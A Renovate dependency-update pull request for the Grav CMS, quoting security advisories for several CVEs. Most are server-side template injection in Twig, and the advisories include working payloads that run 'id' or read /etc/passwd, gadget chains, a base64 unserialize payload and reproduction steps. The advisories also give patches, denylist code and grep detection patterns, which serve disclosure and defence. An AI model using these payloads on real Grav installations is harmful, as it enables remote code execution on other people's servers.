Update dependency getgrav/grav to v1.7.46 [SECURITY] #35
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
![renovate[bot]](https://avatars.githubusercontent.com/in/2740?s=60&v=4){kind=small}
|
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This PR contains the following updates:
1.7.25->1.7.46GitHub Vulnerability Alerts
CVE-2022-0268
In grav prior to version 1.7.28, a low privilege user can create a page with arbitrary javascript by bypassing insufficent XSS filtering.
CVE-2022-0743
User input is not properly sanitized leading to cross site scrpting (xss) in grav.
CVE-2022-0970
Grav prior to 1.7.31 is vulnerable to stored cross-site scripting.
CVE-2022-1173
Stored cross-site scripting in GitHub repository getgrav/grav prior to 1.7.33.
CVE-2022-2073
Grav is vulnerable to Server Side Template Injection via Twig. According to a previous vulnerability report, Twig should not render dangerous functions by default, such as system.
CVE-2023-34251
Summary
I found an RCE(Remote Code Execution) by SSTI in the admin screen.
Details
Remote Code Execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges.
PoC
http://127.0.0.1:8000/admin/pages/typography)id) is being executed.Execution Result
{{['id']|map('system')|join}}{{['cat /etc/passwd']|map('system')|join}}PoC Video
Impact
Remote Command Execution (RCE) is possible.
Occurrences
References
CVE-2023-34252
Hi,
actually we have sent the bug report to [email protected] on 27th March 2023 and on 10th April 2023.
Grav Server-side Template Injection (SSTI) via Insufficient Validation in filterFilter
Summary:
CVSS3.1 Scoring System:
Base Score: 7.2 (High)
Vector String:
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:HProduct Overview:
Grav is a PHP-based flat-file content management system (CMS) designed to provide a fast and simple way to build websites. It supports rendering of web pages written in Markdown and Twig expressions, and provides an administration panel to manage the entire website via an optional Admin plugin.
Vulnerability Summary:
There is a logic flaw in the
GravExtension.filterFilter()function whereby validation against a denylist of unsafe functions is only performed when the argument passed to filter is a string. However, passing an array as a callable argument allows the validation check to be skipped. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution.Vulnerability Details:
The vulnerability can be found in the
GravExtension.filterFilter()function declared in/system/src/Grav/Common/Twig/Extension/GravExtension.php:At [1], the
$arrowparameter contains the argument supplied to the filter. For example, it may refer to"funcname"in{{ array|filter("funcname") }}or the closure (a.k.a. arrow function)el => el != 'exclude'in{{ array|filter(el => el != 'exclude') }}. Observe thatUtils::isDangerousFunction($arrow)is only invoked if$arrowis a string. As such, non-string arguments may be passed totwig_array_filter()at [2] due to the absence of type enforcement at [1].The implementation of the
twig_array_filter()function can be found in /src/Extension/CoreExtension.php within Twig's codebase:At [3], a runtime error is thrown if
$arrowis not a closure and Twig sandbox is enabled. However, since Grav does not use the Twig Sandbox extension, the check passes successfully even when$arrowis not a closure. Subsequently at [4],array_filter()is invoked with the user-controlled$arrayinput and$arrowparameter.Note that the method signature of
array_filter()is as follows:A common mistake that developers make is assuming that the
callabletype refers to astringtype. This is untrue, and it is well documented in the PHP Manual:This means that all of the following method calls are valid:
Going back to [1], if
$arrowis anarrayinstead of astringorclosure, the validation check to prevent invocation of unsafe functions is completely skipped. Multiple static class methods within Grav's codebase and its dependencies were found to be suitable gadgets for achieving for remote code execution:// Gadget 1: Using \Grav\Common\Utils::arrayFilterRecursive() within Grav's codebase to invoke system("id"): {% set id = {'id': 0} %} {{ {'system': id} | filter('\\Grav\\Common\\Utils', 'arrayFilterRecursive') }} // Gadget 2: Using \Symfony\Component\VarDumper\Vardumper::setHandler() and \Symfony\Component\VarDumper\Vardumper::dump() to invoke system("id"): {{ ['system'] | filter(['\\Symfony\\Component\\VarDumper\\VarDumper', 'setHandler'])}} {{ ['id'] | filter(['\\Symfony\\Component\\VarDumper\\VarDumper', 'dump']) }} // Gadget 3: Using \RocketTheme\Toolbox\File\File::instance() in Grav's default theme to perform arbitrary file write to rce.php in the webroot: {{ (['rce.php'] | map(['\\RocketTheme\\Toolbox\\File\\File', 'instance']))[0].save('<?php echo phpinfo(); ') }} // Gadget 4: Using \Symfony\Component\Process\Process::fromShellCommandline() to invoke system("id"): {{ {'/':'sleep 3'} | map(['\\Symfony\\Component\\Process\\Process', 'fromShellCommandline']) | map(e => e.run()) | print_r }}Exploit Conditions:
This vulnerability can be exploited if the attacker has access to:
Reproduction Steps:
Accounts > Add, and ensure that the following permissions are assigned when creating a new low-privileged user:http://<grav_installation>/admin/pages/home.Advancedtab and select the checkbox besideTwigto ensure that Twig processing is enabled for the modified webpage.Contenttab, insert the following payload within the editor:// Gadget 1: Using \Grav\Common\Utils::arrayFilterRecursive() within Grav's codebase to invoke system("id"): {% set id = {'id': 0} %} {{ {'system': id} | filter('\\Grav\\Common\\Utils', 'arrayFilterRecursive') }}idshell command is returned in the preview.Suggested Mitigations:
Patch the logic flaw in the
GravExtension.filterFilter()function declared in/system/src/Grav/Common/Twig/Extension/GravExtension.phpto ensure that the$arrowparamater passed to thefilterFilter()function must either be astringor an arrow function as such:... class GravExtension extends AbstractExtension implements GlobalsInterface { ... /** * @​param Environment $env * @​param array $array * @​param callable|string $arrow * @​return array|CallbackFilterIterator * @​throws RuntimeError */ function filterFilter(Environment $env, $array, $arrow) { - if (is_string($arrow) && Utils::isDangerousFunction($arrow)) { + if (!$arrow instanceof Closure && !is_string($arrow) || Utils::isDangerousFunction($arrow)) { throw new RuntimeError('Twig |filter("' . $arrow . '") is not allowed.'); } return \twig_array_filter($env, $array, $arrow); } }Utils::isDangerousFunction()in /system/src/Grav/Common/Utils.php should also be patched to prevent static class methods from being invoked. For example,... abstract class Utils { ... /** * @​param string $name * @​return bool */ public static function isDangerousFunction(string $name): bool { ... + if (is_array($name) || strpos($name, ":") !== false) { + return false; + } if (in_array($name, $commandExecutionFunctions)) { return true; } if (in_array($name, $codeExecutionFunctions)) { return true; } if (isset($callbackFunctions[$name])) { return true; } if (in_array($name, $informationDiscosureFunctions)) { return true; } if (in_array($name, $otherFunctions)) { return true; } return static::isFilesystemFunction($name); } ... }End users should also ensure that
twig.undefined_functionsandtwig.undefined_filtersproperties in/path/to/webroot/system/config/system.yamlconfiguration file are set tofalseto disallow Twig from treating undefined filters/functions as PHP functions and executing them.Detection Guidance:
The following strategies may be used to detect potential exploitation attempts.
grep -Priz -e '\|\s*(filter|map|reduce)\s*\(' /path/to/webroot/user/pages/grep -Priz -e '\|\s*(filter|map|reduce)\s*\(' --include '*.doctrinecache.data' /path/to/webroot/cache/grep -Priz -e 'twig_array_(filter|map|reduce)' /path/to/webroot/cache/twig/grep -Priz -e '\|\s*(filter|map|reduce)\s*\(' /path/to/webroot/cache/compiled/files/Note that it is not possible to detect indicators of compromise reliably using the Grav log file (located at
/path/to/webroot/logs/grav.logby default), as successful exploitation attempts do not generate any additional logs. However, it is worthwhile to examine any PHP errors or warnings logged to determine the existence of any failed exploitation attempts.Credits:
Ngo Wei Lin (@Creastery) & Wang Hengyue (@w_hy_04) of STAR Labs SG Pte. Ltd. (@starlabs_sg)
Kindly note that STAR Labs reserved and assigned the following CVE identifiers to the respective vulnerabilities presented in this report:
Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in
GravExtension.filterFilter()and to achieve remote code execution via usage of fully-qualified names, supplied as arrays of strings, when referencing callables. This is a bypass of CVE-2022-2073.CVE-2023-34253
Hi,
actually we have sent the bug report to [email protected] on 27th March 2023 and on 10th April 2023.
Grav Server-side Template Injection (SSTI) via Denylist Bypass Vulnerability
Summary:
CVSS3.1 Scoring System:
Base Score: 7.2 (High)
Vector String:
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:HProduct Overview:
Grav is a PHP-based flat-file content management system (CMS) designed to provide a fast and simple way to build websites. It supports rendering of web pages written in Markdown and Twig expressions, and provides an administration panel to manage the entire website via an optional Admin plugin.
Vulnerability Summary:
The denylist introduced in commit 9d6a2d to prevent dangerous functions from being executed via injection of malicious templates was insufficient and could be easily subverted in multiple ways -- (1) using unsafe functions that are not banned, (2) using capitalised callable names, and (3) using fully-qualified names for referencing callables. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution.
Vulnerability Details:
In addressing CVE-2022-2073, a denylist was introduced in commit 9d6a2d to validate and ensure that dangerous functions could not be executed via injection of malicious templates.
The implementation of the denylist can be found in
Utils::isDangerousFunction()within /system/src/Grav/Common/Utils.php:The list of banned functions appears to be adapted from a StackOverflow post. While the denylist looks rather comprehensive, there are actually multiple issues with the denylist implementation:
unserialize()and aliases of blocked functions, such asini_alter(), are not being included in the denylist.filter('SYSTEM')to trivially bypass the denylist validation check.filter('\system')to trivially bypass the denylist validation checks.Exploit Conditions:
This vulnerability can be exploited if the attacker has access to:
Reproduction Steps:
Accounts > Add, and ensure that the following permissions are assigned when creating a new low-privileged user:http://<grav_installation>/admin/pages/home.Advancedtab and select the checkbox besideTwigto ensure that Twig processing is enabled for the modified webpage.Contenttab, insert the following payload within the editor:// Method 1: Using unserialize() to trigger system('id') call // Serialized payloaed generated using the phpggc tool: ./phpggc -b Monolog/RCE7 system 'id' // {{ 'TzozNzoiTW9ub2xvZ1xIYW5kbGVyXEZpbmdlcnNDcm9zc2VkSGFuZGxlciI6NDp7czoxNjoiACoAcGFzc3RocnVMZXZlbCI7aTowO3M6MTA6IgAqAGhhbmRsZXIiO3I6MTtzOjk6IgAqAGJ1ZmZlciI7YToxOntpOjA7YToyOntpOjA7czoyOiJpZCI7czo1OiJsZXZlbCI7aTowO319czoxMzoiACoAcHJvY2Vzc29ycyI7YToyOntpOjA7czozOiJwb3MiO2k6MTtzOjY6InN5c3RlbSI7fX0=' | base64_decode | array | filter('unserialize') }} // Method 2: Trigger system('id') via case-insensitive function names {{ ['id'] | filter('System') }} // Method 3: Trigger system('id') via fully qualified names when referencing functions {{ ['id'] | filter('\\system') }}idshell command is returned in the preview.Suggested Mitigations:
It is recommended to review the list of functions, both default functions in PHP and user-defined functions, and include missing unsafe functions in the denylist. A non-exhaustive list of missing unsafe functions discovered is shown below:
unserialize()ini_alter()simplexml_load_file()simplexml_load_string()forward_static_call()forward_static_call_array()The
Utils::isDangerousFunction()function in /system/src/Grav/Common/Utils.php should also be patched to disallow usage of fully qualified names when specifying callables, as well as ensure that validation performed on the$nameparameter is case-insensitive.For example,
... abstract class Utils { ... /** * @​param string $name * @​return bool */ public static function isDangerousFunction(string $name): bool { ... + if ($arrow instanceof Closure) { + return false; + } + $name = strtolower($name); + if (strpos($name, "\\") !== false) { + return false; + } if (in_array($name, $commandExecutionFunctions)) { return true; } if (in_array($name, $codeExecutionFunctions)) { return true; } if (isset($callbackFunctions[$name])) { return true; } if (in_array($name, $informationDiscosureFunctions)) { return true; } if (in_array($name, $otherFunctions)) { return true; } return static::isFilesystemFunction($name); } ... }End users should also ensure that
twig.undefined_functionsandtwig.undefined_filtersproperties in/path/to/webroot/system/config/system.yamlconfiguration file are set tofalseto disallow Twig from treating undefined filters/functions as PHP functions and executing them.Detection Guidance:
The following strategies may be used to detect potential exploitation attempts.
grep -Priz -e '(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|\|\s*(filter|map|reduce))\s*\(' /path/to/webroot/user/pages/grep -Priz -e '(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|\|\s*(filter|map|reduce))\s*\(' --include '*.doctrinecache.data' /path/to/webroot/cache/grep -Priz -e '(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|twig_array_(filter|map|reduce))\s*\(' /path/to/webroot/cache/twig/grep -Priz -e '(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|\|\s*(filter|map|reduce))\s*\(' /path/to/webroot/cache/compiled/files/Note that it is not possible to detect indicators of compromise reliably using the Grav log file (located at
/path/to/webroot/logs/grav.logby default), as successful exploitation attempts do not generate any additional logs. However, it is worthwhile to examine any PHP errors or warnings logged to determine the existence of any failed exploitation attempts.Credits:
Ngo Wei Lin (@Creastery) & Wang Hengyue (@w_hy_04) of STAR Labs SG Pte. Ltd. (@starlabs_sg)
The scheduled disclosure date is 25th July, 2023. Disclosure at an earlier date is also possible if agreed upon by all parties.
Kindly note that STAR Labs reserved and assigned the following CVE identifiers to the respective vulnerabilities presented in this report:
Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in
Utils::isDangerousFunction()and to achieve remote code execution via usage of unsafe functions, such asunserialize(), that are not blocked. This is a bypass of CVE-2022-2073.Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in
Utils::isDangerousFunction()and to achieve remote code execution via usage of capitalised names, supplied as strings, when referencing callables. This is a bypass of CVE-2022-2073.Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in
Utils::isDangerousFunction()and to achieve remote code execution via usage of fully-qualified names, supplied as strings, when referencing callables. This is a bypass of CVE-2022-2073.CVE-2023-34448
Hi,
actually we have sent the bug report to [email protected] on 27th March 2023 and on 10th April 2023.
Grav Server-side Template Injection (SSTI) via Twig Default Filters
Summary:
CVSS3.1 Scoring System:
Base Score: 7.2 (High)
Vector String:
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:HProduct Overview:
Grav is a PHP-based flat-file content management system (CMS) designed to provide a fast and simple way to build websites. It supports rendering of web pages written in Markdown and Twig expressions, and provides an administration panel to manage the entire website via an optional Admin plugin.
Vulnerability Summary:
The patch for CVE-2022-2073, a server-side template injection vulnerability in Grav leveraging the default
filter()function, did not block other built-in functions exposed by Twig's Core Extension that could be used to invoke arbitrary unsafe functions, thereby allowing for remote code execution.Vulnerability Details:
Twig comes with an extension known as the Core Extension that is enabled by default when initialising a new Twig environment. Twig's Core Extension provides multiple built-in filters, such as the
filter()function, which can be used in Twig templates.CVE-2022-2073 leverages the default
filter()filter function in Twig to invoke arbitrary unsafe functions. This was patched by overriding the defaultfilter()filter function in commit 9d6a2d of Grav v1.7.34 to perform validation checks on the arguments passed tofilter():... class GravExtension extends AbstractExtension implements GlobalsInterface { ... public function getFilters(): array { return [ ... // Security fix + new TwigFilter('filter', [$this, 'filterFilter'], ['needs_environment' => true]), ]; } ... + /** + * @​param Environment $env + * @​param array $array + * @​param callable|string $arrow + * @​return array|CallbackFilterIterator + * @​throws RuntimeError + */ + function filterFilter(Environment $env, $array, $arrow) + { + if (is_string($arrow) && Utils::isDangerousFunction($arrow)) { + throw new RuntimeError('Twig |filter("' . $arrow . '") is not allowed.'); + } + + return \twig_array_filter($env, $array, $arrow); + } }However, looking at the source code of /src/Extension/CoreExtension.php of Twig, alternative default Twig filters could also be used invoke arbitrary functions:
The three filter functions above respectively call
array_filter(),array_map()andarray_reduce(). Since onlyfilter()is being overriden by Grav to ensure that the callable passed tofilter()does not result in the invocation of an unsafe function, the other two functions (i.e.map()andreduce()) could be used by an authenticated attacker that is able to inject and render malicious templates to gain remote code execution.Exploit Conditions:
This vulnerability can be exploited if the attacker has access to:
Reproduction Steps:
Accounts > Add, and ensure that the following permissions are assigned when creating a new low-privileged user:http://<grav_installation>/admin/pages/home.Advancedtab and select the checkbox besideTwigto ensure that Twig processing is enabled for the modified webpage.Contenttab, insert the following payload within the editor:{{ ['id'] | map('system') }} {{ ['id'] | reduce('system') }}idshell command is returned in the preview.Suggested Mitigations:
Override the built-in Twig
map()andreduce()filter functions insystem/src/Grav/Common/Twig/Extension/GravExtension.phpto validate the argument passed to the filter in$arrow.For example:
... class GravExtension extends AbstractExtension implements GlobalsInterface { ... public function getFilters(): array { return [ ... // Security fix new TwigFilter('filter', [$this, 'filterFilter'], ['needs_environment' => true]), + new TwigFilter('map', [$this, 'mapFilter'], ['needs_environment' => true]), + new TwigFilter('reduce', [$this, 'reduceFilter'], ['needs_environment' => true]), ]; } ... + /** + * @​param Environment $env + * @​param array $array + * @​param callable|string $arrow + * @​return array|CallbackFilterIterator + * @​throws RuntimeError + */ + function mapFilter(Environment $env, $array, $arrow) + { + if (!$arrow instanceof Closure && !is_string($arrow) || Utils::isDangerousFunction($arrow)) { + throw new RuntimeError('Twig |map("' . $arrow . '") is not allowed.'); + } + + return \twig_array_map($env, $array, $arrow); + } + + /** + * @​param Environment $env + * @​param array $array + * @​param callable|string $arrow + * @​return array|CallbackFilterIterator + * @​throws RuntimeError + */ + function reduceFilter(Environment $env, $array, $arrow) + { + if (!$arrow instanceof Closure && !is_string($arrow) || Utils::isDangerousFunction($arrow)) { + throw new RuntimeError('Twig |reduce("' . $arrow . '") is not allowed.'); + } + + return \twig_array_reduce($env, $array, $arrow); + } }Detection Guidance:
The following strategies may be used to detect potential exploitation attempts.
grep -Priz -e '\|\s*(map|reduce)\s*\(' /path/to/webroot/user/pages/grep -Priz -e '\|\s*(map|reduce)\s*\(' --include '*.doctrinecache.data' /path/to/webroot/cache/grep -Priz -e 'twig_array_(map|reduce)' /path/to/webroot/cache/twig/grep -Priz -e '\|\s*(map|reduce)\s*\(' /path/to/webroot/cache/compiled/files/Note that it is not possible to detect indicators of compromise reliably using the Grav log file (located at
/path/to/webroot/logs/grav.logby default), as successful exploitation attempts do not generate any additional logs. However, it is worthwhile to examine any PHP errors or warnings logged to determine the existence of any failed exploitation attempts.Credits:
Ngo Wei Lin (@Creastery) & Wang Hengyue (@w_hy_04) of STAR Labs SG Pte. Ltd. (@starlabs_sg)
Vulnerability Disclosure:
This vulnerability report is subject to a 120 day disclosure deadline as per STAR Labs SG Pte. Ltd.'s Vulnerability Disclosure Policy. After 120 days have elapsed, the vulnerability report will be published to the public by STAR Labs SG Pte. Ltd. (STAR Labs).
The scheduled disclosure date is 25th July, 2023. Disclosure at an earlier date is also possible if agreed upon by all parties.
Kindly note that STAR Labs reserved and assigned the following CVE identifiers to the respective vulnerabilities presented in this report:
Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in
GravExtension.filterFilter()and to achieve remote code execution via Twig's default filtersmap()andreduce(). This is a bypass of CVE-2022-2073.CVE-2023-37897
Summary
The fix for SSTI using
|map,|filterand|reducetwigs implemented in the commit 71bbed1 introduces bypass of the denylist due to incorrect return value fromisDangerousFunction(), which allows to execute the payload prepending double backslash (\\)Details
The
isDangerousFunction()check in version 1.7.42 and onwards retunsfalsevalue instead oftruewhen the\symbol is found in the$name.Based on the code where the function is used, it is expected that any dangerous condition would return
truewhen
|map('\system')is used in the malicious payload, the single backslash is dropped prior to reachingstrpos($name, '\\')check, thus$namevariable already has no backslash, and the command is blacklisted because it reaches theif (in_array($name, $commandExecutionFunctions)) {validation step.However if
|map('\\system')is used (i.e. double backslash), then thestrpos($name, "\\") !== falsetakes effect, andisDangerousFunction()returnsfalse, in which case theRuntimeErroris not generated, and blacklist is bypassed leading to code execution.Exploit Conditions
This vulnerability can be exploited if the attacker has access to:
Steps to reproduce
Accounts > Add, and ensure that the following permissions are assigned when creating a new low-privileged user:Pages -> HomeAdvancedtab and select the checkbox besideTwigto ensure that Twig processing is enabled for the modified webpage.Contenttab, insert the following payload within the editor:{{ ['id'] | map('\\system') | join() }}Previewbutton. Observe that the output of the id shell command is returned in the preview.Mitigation
CVE-2024-27923
Summary